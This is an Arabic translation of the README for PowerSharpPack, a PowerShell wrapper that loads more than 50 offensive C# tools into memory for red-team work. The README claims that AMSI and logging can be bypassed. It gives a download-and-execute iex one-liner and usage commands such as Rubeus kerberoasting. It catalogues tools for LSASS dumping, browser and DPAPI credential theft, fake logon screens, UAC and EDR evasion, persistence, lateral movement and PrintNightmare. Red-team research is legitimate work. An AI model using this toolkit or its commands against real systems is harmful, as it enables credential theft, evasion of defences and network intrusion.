
غلاف PowerShell يجمع أكثر من 50 أداة أمنية هجومية بلغة C# لمرحلة ما بعد الاستغلال، وتصعيد الامتيازات، وسحب بيانات الاعتماد، والحركة الجانبية، واستكشاف دليل Active Directory في أنشطة الفريق الأحمر.
العديد من مشاريع CSharp الهجومية المفيدة ملفوفة في PowerShell لسهولة الاستخدام.
لماذا؟ في رأيي الشخصي، PowerShell الهجومي لم يمت بسبب AMSI أو تسجيل النصوص البرمجية أو وضع اللغة المقيدة أو ميزات الحماية الأخرى. يمكن تجاوز أي من هذه الآليات. نظرًا لأن معظم المشاريع الأمنية الهجومية الجديدة والمبتكرة تُكتب بلغة C#، قررت جعلها قابلة للاستخدام في PowerShell أيضًا.
إذن، ما الذي قمت به بشكل أساسي هنا؟
[System.Reflection.Assembly]::Load($DecompressedDecodedBinary).إنها عملية سهلة جدًا ولكنها تستغرق وقتًا طويلاً بالنسبة للعديد من المستودعات.
ما هي الأدوات المضمنة؟
Internalmonologue
هجوم المونولوج الداخلي: استرداد تجزئات NTLM دون لمس LSASS
@شكر لـ: https://github.com/eladshamir/Internal-Monologue
Seatbelt
Seatbelt هو مشروع C# يقوم بعدد من "فحوصات السلامة" الأمنية للمضيف ذات الصلة من منظور هجومي ودفاعي.
@شكر لـ: https://github.com/GhostPack/Seatbelt
SharpWeb
مشروع .NET 2.0 CLR لاسترداد بيانات اعتماد المتصفح المحفوظة من Google Chrome وMozilla Firefox وMicrosoft Internet Explorer/Edge.
@شكر لـ: https://github.com/djhohnstein/SharpWeb
UrbanBishop
ينشئ قسم RW محلي في UrbanBishop ثم يعيّن هذا القسم كـ RX في عملية بعيدة. تحميل شيل كود أصبح سهلاً.
@شكر لـ: https://github.com/FuzzySecurity/Sharp-Suite
SharpUp
SharpUp هو منفذ C# لوظائف PowerUp المختلفة.
@شكر لـ: https://github.com/GhostPack/SharpUp
Rubeus
Rubeus هو مجموعة أدوات C# للتفاعل الخام مع Kerberos وإساءة استخدامه.
@شكر لـ: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/
SharPersist
مجموعة أدوات الثبات (Persistence) في Windows مكتوبة بلغة C#.
@شكر لـ: https://github.com/fireeye/SharPersist
Sharpview
تنفيذ C# لـ harmj0y's PowerView
@شكر لـ: https://github.com/tevora-threat/SharpView
winPEAS
تحقق من قائمة تصعيد الامتيازات المحلية في Windows من book.hacktricks.xyz
@شكر لـ: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Lockless
Lockless يسمح بنسخ الملفات المقفلة.
@شكر لـ: https://github.com/GhostPack/Lockless
SharpChromium
مشروع .NET 4.0 CLR لاسترداد بيانات Chromium، مثل ملفات تعريف الارتباط وسجل التصفح وبيانات تسجيل الدخول المحفوظة.
@شكر لـ: https://github.com/djhohnstein/SharpChromium
SharpDPAPI
SharpDPAPI هو منفذ C# لبعض وظائف Mimikatz DPAPI.
@شكر لـ: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/
SharpShares
تعداد جميع المشاركات الشبكية في المجال الحالي. يمكنه أيضًا تحليل الأسماء إلى عناوين IP.
@شكر لـ: https://github.com/djhohnstein/SharpShares
SharpSniper
العثور على مستخدمين محددين في الدليل النشط عبر اسم المستخدم وعنوان IP لتسجيل الدخول.
@شكر لـ: https://github.com/HunnicCyber/SharpSniper
SharpSpray
SharpSpray عبارة عن مجموعة تعليمات برمجية بسيطة لتنفيذ هجوم رش كلمات المرور ضد جميع مستخدمي المجال باستخدام LDAP وهو متوافق مع Cobalt Strike.
@شكر لـ: https://github.com/jnqpblc/SharpSpray
Watson
تعداد التحديثات المفقودة (KB) واقتراح ثغرات مفيدة لتصعيد الامتيازات.
@شكر لـ: https://github.com/rasta-mouse/Watson
Grouper2
العثور على ثغرات في نهج المجموعة (Group Policy) في Active Directory.
@شكر لـ: https://github.com/l0ss/Grouper2
Tokenvator
أداة لرفع الامتيازات باستخدام رموز Windows.
@شكر لـ: https://github.com/0xbadjuju/Tokenvator
SauronEye
أداة بحث للعثور على ملفات محددة تحتوي على كلمات محددة، مثل الملفات التي تحتوي على كلمات مرور.
@شكر لـ: https://github.com/vivami/SauronEye
قم فقط بتحميل النص البرمجي الرئيسي باستخدام
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
واختر الأداة كمعامل (switch) على سبيل المثال:
PowerSharpPack -seatbelt -Command "AMSIProviders"
إذا كنت ترغب في تمرير عدة معاملات إلى الملف الثنائي، يمكنك استخدام علامات الاقتباس مثل:
PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"
إذا كنت لا ترغب في تحميل جميع الملفات الثنائية لأي سبب، يمكنك استخدام نصوص PowerShell الفردية لكل ملف ثنائي الموجودة في مجلد PowerSharpBinaries.
المشاريع المتوفرة أيضًا كنصوص PowerShell مستقلة:
SharpCloud
C# بسيط للتحقق من وجود ملفات بيانات اعتماد متعلقة بـ AWS وMicrosoft Azure وGoogle Compute.
@شكر لـ: https://github.com/chrismaddalena/SharpCloud
SharpSSDP
اكتشاف خدمة SSDP.
@شكر لـ: https://github.com/rvrsh3ll/SharpSSDP
DAFT
DAFT: إطار عمل وأدوات تدقيق قواعد البيانات.
@شكر لـ: https://github.com/NetSPI/DAFT
Get-RBCD-Threaded
أداة لاكتشاف مسارات هجوم التفويض المقيد القائم على الموارد (Resource-Based Constrained Delegation) في بيئات Active Directory.
@شكر لـ: https://github.com/FatRodzianko/Get-RBCD-Threaded
SharpGPO-RemoteAccessPolicies
أداة C# لتعداد سياسات الوصول عن بُعد من خلال نهج المجموعة.
@شكر لـ: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies
SharpAllowedToAct
الاستيلاء على كائن الكمبيوتر من خلال التفويض المقيد القائم على الموارد (msDS-AllowedToActOnBehalfOfOtherIdentity).
@شكر لـ: https://github.com/pkb1s/SharpAllowedToAct
WireTap
مشروع .NET 4.0 للتفاعل مع أجهزة الفيديو والصوت ولوحة المفاتيح.
@شكر لـ: https://github.com/djhohnstein/WireTap
SharpClipboard
مراقب الحافظة (Clipboard) بلغة C#.
@شكر لـ: https://github.com/slyd0g/SharpClipboard
SharpPrinter
اكتشاف الطابعات + التحقق من الثغرات.
@شكر لـ: https://github.com/rvrsh3ll/SharpPrinter
SharpHide
أداة لإنشاء مفاتيح تسجيل مخفية.
@شكر لـ: https://github.com/outflanknl/SharpHide
SpoolSample
أداة إثبات مفهوم لإجبار مضيفي Windows على المصادقة على أجهزة أخرى عبر واجهة MS-RPRN RPC. هذا ممكن عبر بروتوكولات أخرى أيضًا.
@شكر لـ: https://github.com/leechristensen/SpoolSample
SharpGPOAbuse
SharpGPOAbuse هو تطبيق .NET مكتوب بلغة C# يمكن استخدامه لاستغلال حقوق تحرير المستخدم على كائن نهج المجموعة (GPO) لاختراق الكائنات التي يتم التحكم بها بواسطة ذلك GPO.
@شكر لـ: https://github.com/FSecureLABS/SharpGPOAbuse
SharpDump
SharpDump هو منفذ C# لوظيفة Out-Minidump.ps1 من PowerSploit.
@شكر لـ: https://github.com/GhostPack/SharpDump
SharpHound3
جامع بيانات C# لمشروع BloodHound، الإصدار 3.
@شكر لـ: https://github.com/BloodHoundAD/SharpHound3
PostDump
أداة أخرى لعمل minidump لعملية LSASS باستخدام بعض التقنيات لتجنب الكشف.
@شكر لـ: https://github.com/YOLOP0wn/POSTDump
SharpLocker
SharpLocker يساعد في الحصول على بيانات اعتماد المستخدم الحالي من خلال ظهور شاشة قفل Windows مزيفة، ويتم إرسال جميع المخرجات إلى Console مما يعمل بشكل مثالي مع Cobalt Strike.
@شكر لـ: https://github.com/Pickfordmatt/SharpLocker
Eyewitness
EyeWitness مصمم لالتقاط لقطات شاشة لمواقع الويب، وتقديم بعض معلومات رأس الخادم، وتحديد بيانات الاعتماد الافتراضية إن أمكن.
@شكر لـ: https://github.com/FortyNorthSecurity/EyeWitness
FakeLogonScreen
شاشة تسجيل دخول Windows مزيفة لسرقة كلمات المرور.
@شكر لـ: https://github.com/bitsadmin/fakelogonscreen
P0wnedShell
مجموعة أدوات استغلال بعد الاختراق في PowerShell Runspace.
@شكر لـ: https://github.com/Cn33liz/p0wnedShell
Safetykatz
SafetyKatz هو مزيج من نسخة معدلة قليلاً من مشروع Mimikatz لـ @gentilkiwi ومُحمل PE .NET لـ @subTee. قمت بتعديله مرة أخرى بإصدار Mimikatz مشوش خاص بي.
@شكر لـ: https://github.com/GhostPack/SafetyKatz
InveighZero
أداة انتحال/رجل-في-الوسط لـ LLMNR/mDNS/NBNS/DNS/DHCPv6 في Windows بلغة C#.
@شكر لـ: https://github.com/Kevin-Robertson/InveighZero
SharpSploit
SharpSploit هي مكتبة استغلال بعد الاختراق بلغة .NET مكتوبة بلغة C#.
@شكر لـ: https://github.com/cobbr/SharpSploit
Snaffler
أداة لاختبار الاختراق للمساعدة في العثور على الحلوى اللذيذة، بواسطة @l0ss و @Sh3r4 ( تويتر: @/mikeloss و @/sh3r4_hax ).
@شكر لـ: https://github.com/SnaffCon/Snaffler
BadPotato
Printspoofer من itm4ns بلغة C#.
@شكر لـ: https://github.com/BeichenDream/BadPotato
BetterSafetyKatz
فرع من SafetyKatz يجلب ديناميكيًا أحدث إصدار مُجمّع مسبقًا من Mimikatz مباشرة من مستودع gentilkiwi على GitHub، ويُصحح التوقيعات وقت التشغيل ويستخدم SharpSploit DInvoke لتحميل PE في الذاكرة.
@شكر لـ: https://github.com/Flangvik/BetterSafetyKatz
SharpKatz
منفذ C# لأوامر sekurlsa::logonpasswords و sekurlsa::ekeys و lsadump::dcsync من mimikatz.
@شكر لـ: https://github.com/b4rtik/SharpKatz
Gopher
أداة C# لاكتشاف الثمار المنخفضة (low hanging fruits).
@شكر لـ: https://github.com/EncodeGroup/Gopher
SharpOxidResolver
IOXIDResolver من AirBus Security/PingCastle.
@شكر لـ: https://github.com/vletoux/pingcastle/
SharpBlock
طريقة لتجاوز مكتبات الإسقاط النشطة (active projection DLLs) لـ EDR عن طريق منع تنفيذ نقطة الدخول.
@شكر لـ: https://github.com/CCob/SharpBlock
SharpLoginPrompt
ينشئ هذا البرنامج موجه تسجيل دخول لجمع اسم المستخدم وكلمة المرور للمستخدم الحالي. يسمح هذا المشروع لفريق الأحمر بانتحال اسم المستخدم وكلمة المرور للمستخدم الحالي دون لمس LSASS ودون الحصول على صلاحيات المسؤول على النظام.
@شكر لـ: https://github.com/shantanu561993/SharpLoginPrompt
ThunderFox
استرداد البيانات (جهات الاتصال، رسائل البريد الإلكتروني، السجل، ملفات تعريف الارتباط وبيانات الاعتماد) من Thunderbird وFirefox.
@شكر لـ: https://github.com/V1V1/SharpScribbles
StickyNotesExtract
استخراج البيانات من قاعدة بيانات الملاحظات اللاصقة (Sticky Notes) في Windows. يعمل على Windows 10 Build 1607 والإصدارات الأحدث. لا يعتمد هذا المشروع على أي تبعيات خارجية.
@شكر لـ: https://github.com/V1V1/SharpScribbles
SCShell
أداة حركة جانبية غير ملفية (fileless) تعتمد على ChangeServiceConfigA لتشغيل الأوامر.
@شكر لـ: https://github.com/Mr-Un1k0d3r/SCShell
SharpSecDump
منفذ .NET لوظيفة تفريغ SAM البعيد وأسرار LSA من impacket's secretsdump.py.
@شكر لـ: https://github.com/G0ldenGunSec/SharpSecDump
SharpHandler
يعيد هذا المشروع استخدام المقابض المفتوحة لـ lsass لتحليل أو تفريغ minidump لـ lsass، وبالتالي لا تحتاج إلى استخدام مقبض lsass الخاص بك للتفاعل معه.
@شكر لـ: https://github.com/jfmaes/SharpHandler
SharpRDP
تطبيق .NET Console لبروتوكول سطح المكتب البعيد لتنفيذ الأوامر بعد المصادقة.
@شكر لـ: https://github.com/0xthirteen/SharpRDP
SharpMove
مشروع .NET لتنفيذ العمليات عن بُعد بعد المصادقة.
@شكر لـ: https://github.com/0xthirteen/SharpMove
SharpStay
مشروع .NET لتثبيت الثبات (Persistence).
@شكر لـ: https://github.com/0xthirteen/SharpStay
SharpPrintNightmare
تنفيذ C# لثغرة PrintNightmare CVE-2021-1675/CVE-2021-34527.
@شكر لـ: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare
Certify
إساءة استخدام شهادات Active Directory.
@شكر لـ: https://github.com/GhostPack/Certify
Farmer
Farmer هو مشروع لجمع تجزئات NetNTLM في مجال Windows. يحقق Farmer ذلك عن طريق إنشاء خادم WebDAV محلي يتسبب في مصادقة موجه WebDAV المصغر من أي عملاء متصلين.
@شكر لـ: https://github.com/mdsecactivebreach/Farmer
SharpBypassUAC
أداة C# لتجاوز UAC.
@شكر لـ: https://github.com/FatRodzianko/SharpBypassUAC
StandIn
StandIn هي مجموعة أدوات صغيرة للاستغلال بعد الاختراق في AD تعمل على .NET35/45.
@شكر لـ: https://github.com/FuzzySecurity/StandIn
Carbuncle
أداة للتفاعل مع واجهة Outlook أثناء عمليات الفريق الأحمر.
@شكر لـ: https://github.com/checkymander/Carbuncle
Whisker
Whisker هي أداة C# للاستيلاء على حسابات المستخدمين والكمبيوتر في Active Directory من خلال التلاعب بسمة msDS-KeyCredentialLink الخاصة بهم، مما يضيف "بيانات اعتماد الظل" بشكل فعال إلى الحساب المستهدف.
@شكر لـ: https://github.com/eladshamir/Whisker
SharpLdapRelayScan
منفذ C# لـ LdapRelayScan.
@شكر لـ: https://github.com/klezVirus/SharpLdapRelayScan
LdapSignCheck
مشروع C# للتحقق من توقيع LDAP.
@شكر لـ: https://github.com/cube0x0/LdapSignCheck
SharpImpersonation
SharpImpersonation - أداة انتحال هوية المستخدم - عبر Token أو حقن شيل كود.
@شكر لـ: https://github.com/S3cur3Th1sSh1t/SharpImpersonation
SharpWSUS
SharpWSUS هي أداة CSharp للحركة الجانبية عبر WSUS. توجد مدونة مقابلة (https://labs.nettitude.com/blog/introducing-sharpwsus/) تحتوي على معلومات أكثر تفصيلاً حول الأداة وحالة الاستخدام والكشف.
@شكر لـ: https://github.com/nettitude/SharpWSUS
MalSCCM
تسمح لك هذه الأداة بإساءة استخدام خوادم SCCM المحلية أو البعيدة لنشر تطبيقات ضارة على المضيفين الذين تديرهم. لاستخدام هذه الأداة، يجب أن يكون لعملية الحالية صلاحيات المسؤول على خادم SCCM. عادةً ما تحتوي عمليات نشر SCCM على خادم الإدارة والخادم الأساسي على نفس المضيف، وفي هذه الحالة يمكن استخدام المضيف الذي تم إرجاعه من أمر locate كخادم أساسي.
@شكر لـ: https://github.com/nettitude/MalSCCM
KrbRelay
إطار عمل لتوجيه Kerberos.
@شكر لـ: https://github.com/cube0x0/KrbRelay
SharpSCCM
أداة C# للتفاعل مع SCCM.
@شكر: https://github.com/Mayyhem/SharpSCCM
ShadowSpray
أداة لرش بيانات اعتماد الظل عبر مجال بأكمله على أمل إساءة استخدام DACLs من نوع GenericWrite/GenericAll المنسية منذ زمن طويل على كائنات أخرى في المجال.
@شكر: https://github.com/Dec0ne/ShadowSpray
Grouper3
العثور على ثغرات في نهج المجموعة (Group Policy) في Active Directory، ولكن بشكل أفضل مما فعلته Grouper2.
@شكر لـ: https://github.com/Group3r/Group3r
HandleKatz
مُفَرِّغ lsass PIC باستخدام مقابض مستنسخة.
@شكر لـ: https://github.com/codewhitesec/HandleKatz
NanoDump
افرغ LSASS كما تعنيها.
@شكر لـ: https://github.com/helpsystems/nanodump
PPLDump
افرغ ذاكرة عملية PPL باستخدام استغلال على مستوى المستخدم.
@شكر لـ: https://github.com/itm4n/PPLdump